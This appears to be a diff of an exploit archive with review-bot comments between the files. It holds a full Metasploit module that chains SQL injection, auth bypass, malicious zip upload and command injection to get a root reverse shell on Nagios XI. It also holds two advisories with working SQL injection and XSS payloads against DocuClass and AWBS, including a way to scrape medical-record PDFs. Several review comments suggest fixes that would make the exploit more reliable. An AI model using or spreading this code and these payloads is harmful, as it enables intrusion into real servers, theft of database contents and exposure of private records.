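Review bot: the header of the embedded wget-exploit.py reads `# Wget 1.18 < Arbitrary File Upload Exploit`, which inverts the affected range stated everywhere else in the advisory (`GNU Wget < 1.18`); it should read `Wget < 1.18`. Both handlers test `"Wget" not in self.headers.getheader('User-Agent')` without a default, so a request that carries no User-Agent header makes `getheader` return None and the server dies with `TypeError` instead of answering; `getheader('User-Agent', '')` matches the `content-length` call below it. In the PHP scenario the fetched file is `goeip.db` while the directory and comment say geoip; presumably `geoip.db`. Spelling: "paramter", "priodically", "networ", and the misplaced comma in "As cron runs priodically attackers, could". Under VIII. SOLUTION only the version bump is listed; the advisory's own section IV already gives defenders two workarounds worth repeating there: pinning the destination with `-O` defeats the filename substitution, and not running wget from a home directory or web root under a privileged cron job removes the `.wgetrc` and web-shell paths described in section V.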

platforms/linux/remote/40067.rb Executable file

@ -0,0 +1,275 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios XI Chained Remote Code Execution',
'Description' => %q{
This module exploits an SQL injection, auth bypass, file upload,
command injection, and privilege escalation in Nagios XI <= 5.2.7
to pop a root shell.
},
'Author' => [
'Francesco Oddo', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
['EDB', '39899']
],
'DisclosureDate' => 'Mar 6 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp php perl python openssl gawk'
}
},
'Targets' => [
['Nagios XI <= 5.2.7', version: Gem::Version.new('5.2.7')]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash',
'LHOST' => Rex::Socket.source_address
}
))
end
def check
res = send_request_cgi!(
'method' => 'GET',
'uri' => '/nagiosxi/'
)
return unless res && (html = res.get_html_document)
if (version = html.at('//input[@name = "version"]/@value'))
vprint_status("Nagios XI version: #{version}")
if Gem::Version.new(version) <= target[:version]
return CheckCode::Appears
end
end
CheckCode::Safe
end
def exploit
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
end
print_status('Getting API token')
get_api_token
print_status('Getting admin cookie')
get_admin_cookie
print_status('Getting monitored host')
get_monitored_host
print_status('Downloading component')
download_profile_component
print_status('Uploading root shell')
upload_root_shell
print_status('Popping shell!')
pop_dat_shell
end
#
# Cleanup methods
#
def on_new_session(session)
super
print_status('Cleaning up...')
commands = [
'rm -rf ../profile',
'unzip -qd .. ../../../../tmp/component-profile.zip',
'chown -R nagios:nagios ../profile',
"rm -f ../../../../tmp/component-#{zip_filename}"
]
commands.each do |command|
vprint_status(command)
session.shell_command_token(command)
end
end
#
# Exploit methods
#
def get_api_token
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/includes/components/nagiosim/nagiosim.php',
'vars_get' => {
'mode' => 'resolve',
'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
'SELECT backend_ticket FROM xi_users WHERE user_id=1' \
'),FLOOR(RAND(0)*2))x ' \
'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
}
)
if res && res.body =~ /Duplicate entry '(.*?).'/
@api_token = $1
vprint_good("API token: #{@api_token}")
else
fail_with(Failure::UnexpectedReply, 'API token not found! punt!')
end
end
def get_admin_cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/rr.php',
'vars_get' => {
'uid' => "1-#{Rex::Text.rand_text_alpha(8)}-" +
Digest::MD5.hexdigest(@api_token)
}
)
if res && (@admin_cookie = res.get_cookies.split('; ').last)
vprint_good("Admin cookie: #{@admin_cookie}")
get_csrf_token(res.body)
else
fail_with(Failure::NoAccess, 'Admin cookie not found! punt!')
end
end
def get_csrf_token(body)
if body =~ /nsp_str = "(.*?)"/
@csrf_token = $1
vprint_good("CSRF token: #{@csrf_token}")
else
fail_with(Failure::UnexpectedReply, 'CSRF token not found! punt!')
end
end
def get_monitored_host
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/ajaxhelper.php',
'cookie' => @admin_cookie,
'vars_get' => {
'cmd' => 'getxicoreajax',
'opts' => '{"func":"get_hoststatus_table"}',
'nsp' => @csrf_token
}
)
return unless res && (html = res.get_html_document)
if (@monitored_host = html.at('//div[@class = "hostname"]/a/text()'))
vprint_good("Monitored host: #{@monitored_host}")
else
fail_with(Failure::UnexpectedReply, 'Monitored host not found! punt!')
end
end
def download_profile_component
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/admin/components.php',
'cookie' => @admin_cookie,
'vars_get' => {
'download' => 'profile'
}
)
if res && res.body =~ /^PK\x03\x04/
@profile_component = res.body
else
fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!')
end
end
def upload_root_shell
mime = Rex::MIME::Message.new
mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"')
mime.add_part('1', nil, nil, 'form-data; name="upload"')
mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
mime.add_part(payload_zip, 'application/zip', 'binary',
'form-data; name="uploadedfile"; ' \
"filename=\"#{zip_filename}\"")
res = send_request_cgi!(
'method' => 'POST',
'uri' => '/nagiosxi/admin/components.php',
'cookie' => @admin_cookie,
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
if res && res.code != 200
if res.redirect? && res.redirection.path == '/nagiosxi/install.php'
vprint_warning('Nagios XI not configured')
else
fail_with(Failure::PayloadFailed, 'Failed to upload root shell! punt!')
end
end
end
def pop_dat_shell
send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php',
'cookie' => @admin_cookie,
'vars_get' => {
'host' => @monitored_host,
'end' => ';sudo ../profile/getprofile.sh #'
}
)
end
#
# Support methods
#
def payload_zip
zip = Rex::Zip::Archive.new
Zip::File.open_buffer(@profile_component) do |z|
z.each do |f|
zip.entries << Rex::Zip::Entry.new(
f.name,
(if f.ftype == :file
if f.name == 'profile/getprofile.sh'
payload.encoded
else
z.read(f)
end
else
''
end),
Rex::Zip::CM_DEFLATE,
nil,
(Rex::Zip::EFA_ISDIR if f.ftype == :directory)
)
end
end
zip.pack
end
#
# Utility methods
#
def zip_filename
@zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
end
end
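Review bot: `get_monitored_host` exits with a bare `return unless res && (html = res.get_html_document)`, so a missing or non-HTML response leaves `@monitored_host` nil and `exploit` carries on through `download_profile_component`, `upload_root_shell` and `pop_dat_shell`, sending `'host' => nil` in the final injection request; make that branch `fail_with(Failure::UnexpectedReply, 'Monitored host not found! punt!')` like the sibling helpers. The same gap is in `upload_root_shell`, where `if res && res.code != 200` treats a nil response as a successful upload, and the `install.php` redirect case only emits `vprint_warning('Nagios XI not configured')` before the module proceeds to trigger the payload; both paths should `fail_with` rather than continue. Minor: `check` returns nil instead of `CheckCode::Unknown` when there is no response, so the operator gets the misleading 'Vulnerable version not found!' message for an unreachable host, and `Gem::Version.new(version)` can raise `ArgumentError` on a malformed `version` input value instead of falling through to `CheckCode::Safe`.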


@ -1,3 +1,6 @@
Advisory ID: ZSL-2016-5336
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5336.php
eCardMAX 10.5 SQL Injection and XSS Vulnerabilities

platforms/php/webapps/40059.txt Executable file

@ -0,0 +1,62 @@
# Exploit Title: [CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities]
# Date: [July 15, 2016]
# Exploit Author: [Karn Ganeshen (ipositivesecurity.blogspot.com)]
# Vendor Homepage: [cima-software.com]
# Version: [app version] (All)
# Tested on: [Microsoft Windows 2008 R2]
DocuClass is a modular and scalable enterprise content management (ECM) solution that allows organizations to streamline internal operations by significantly improving the way they manage their information within a business process.
Vulnerability Details
1. SQL Injection [Post Auth]
PoC
Vulnerable URLs & parameters:
A: POST request
/dcrpcserver.php [parameter - uid]
---
Parameter: uid (POST)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: cmd=searchform&action=getsavedqueries&node=&uid=(SELECT (CASE WHEN (7877=7877) THEN 7877 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: Microsoft SQL Server 2008
Impact
An unauthenticated attacker can read or modify data in the application database, execute code, and compromise the host system.
B: GET request
/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755 [parameter - userid]
2. Access Control Flaws
DocuClass web application does not enforce strict access control.
PoC:
http://IP/medical_records/0000001337/0000000000123456.pdf
Dump all the documents with a bit of scripting.
Impact
An unauthenticated user can access stored documents by directly calling the document url.
3. Cross-Site Scripting
DocuClass web application lacks strong input validation, and multiple urls & parameters are vulnerable to cross-site scripting (CWE-79) attacks.
/e-forms/dcformsserver.exe [action parameter]
/e-forms/dcformsserver.exe [documentid parameter]
/e-forms/dcformsserver.exe [userid parameter]
/reports_server.php [cmd parameter]
/reports_server.php [reportid parameter]
/reports_server.php [uid parameter]
Impact
An attacker may be able to execute arbitrary scripts/code in the context of the user's browser.
+++++
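Review bot: the advisory contradicts itself on the two facts a reader needs for triage. The heading says `1. SQL Injection [Post Auth]` but the Impact paragraph says `An unauthenticated attacker can read or modify data in the application database`; pick one. The pasted sqlmap output labels the technique `Title: PostgreSQL boolean-based blind - Parameter replace` while the fingerprint below it reports `back-end DBMS: Microsoft SQL Server 2008`, so one of those lines is from a different run and should be corrected. The template fields were also never filled in or un-bracketed: `# Version: [app version] (All)` says nothing about affected versions, and `[Date]`, `[Exploit Author]` and `[Vendor Homepage]` keep their brackets. Finally, the `B: GET request` entry (`dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755`) names `userid` as the injection point but, unlike item A, gives no payload or technique, and the Access Control PoC (`/medical_records/0000001337/0000000000123456.pdf`) would be clearer with one sentence on how the two numeric path components are derived, since "Dump all the documents with a bit of scripting" presumes they are predictable.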

platforms/php/webapps/40062.txt Executable file

@ -0,0 +1,100 @@
AWBS v2.9.6 Multiple Remote Vulnerabilities
Vendor: Total Online Solutions, Inc.
Product web page: http://www.awbs.com
Affected version: 2.9.6
Platform: PHP
Summary: Whether starting new or looking to expand your
existing web hosting and/or domain registration business,
the AWBS fully automated solutions and unique features will
allow you achieve your goal with minimum effort and cost.
Desc: AWBS suffers from multiple SQL Injection vulnerabilities.
Input passed via the 'cat' and 'so' GET parameters are not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary
SQL code. Multiple cross-site scripting vulnerabilities were also
discovered. The issue is triggered when input passed via multiple
parameters is not properly sanitized before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Apache
PHP/5.3.28
MySQL/5.5.50-cll
Vulnerability discovered by Bikramaditya Guha aka "PhoenixX"
@zeroscience
Advisory ID: ZSL-2016-5337
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5337.php
08.06.2016
--
1. SQL Injection:
-----------------
Parameter: cat, so (GET)
POC URL:
http://localhost/admin/omanage.php?search=1&cat=status%27&list=1&so=status
http://localhost/admin/hostingadmin.php?list=f&so=domain%27
http://localhost/admin/aomanage.php?search=1&cat=status%20UNION%20select%201,2,3,version%28%29,5,current_user,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&list=3&so=status'
http://localhost/admin/hostingarchiveadmin.php?search=1&cat=status UNION select 1--&list=1&so=status'
http://localhost/admin/dsarchiveadmin.php?search=1&cat=status&list=3&so=31
http://localhost/admin/domainadmin.php?search=&cat=&list=&sd=&so=100
2. Cross-Site Scripting (Stored):
---------------------------------
http://localhost/admin/cmanage.php
Parameters: reason (POST)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://localhost/admin/helpdesk.php
Parameters: hd_name, hd_url, hd_subject (POST)
Payload(s):
Content-Disposition: form-data; name="hd_name"
"><script>alert(1)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_url"
"><script>alert(2)</script>
-----------------------------28698210634144
Content-Disposition: form-data; name="hd_subject"
<img src=x onerror=alert(3)>
-----------------------------28698210634144
3. Cross-Site Scripting (Reflected):
------------------------------------
http://localhost/admin/useradmin.php
Parameters: list (POST)
http://localhost/admin/omanage.php?search=1%22%3E%3Cscript%3Ealert%283%29%3C/script%3E&cat=status%22%3E%3Cscript%3Ealert%284%29%3C/script%3E&list=4%22%3E%3Cscript%3Ealert%282%29%3C/script%3E&so=status%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameters: search, cat, list, so (GET)
http://localhost/admin/ccmanage.php?find_enc=1&list=1%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
Parameter: list (GET)
http://localhost/admin/cmanage.php?edit=1&action=edit&add_credits=1&id=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&search=&cat=&list=&sd=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E
Parameters: id, sd (GET)
Payload(s):
%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
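Review bot: the SQL injection section claims `Input passed via the 'cat' and 'so' GET parameters are not properly sanitised`, yet two of the six PoC URLs carry no injection at all (`dsarchiveadmin.php?search=1&cat=status&list=3&so=31` and `domainadmin.php?search=&cat=&list=&sd=&so=100` are plain values), so either add the payload that produces the error or UNION result there or drop them from the list; the `aomanage.php` UNION with 21 columns is the only entry that demonstrates extraction and would benefit from one line stating that `version()` and `current_user` came back in the page. In the reflected XSS section, `useradmin.php` lists `Parameters: list (POST)` with no request body or payload, unlike every other entry, and the stored XSS entry for `helpdesk.php` shows multipart fragments with a boundary but not the request line or the page where the stored values are rendered, which is what distinguishes stored from reflected here.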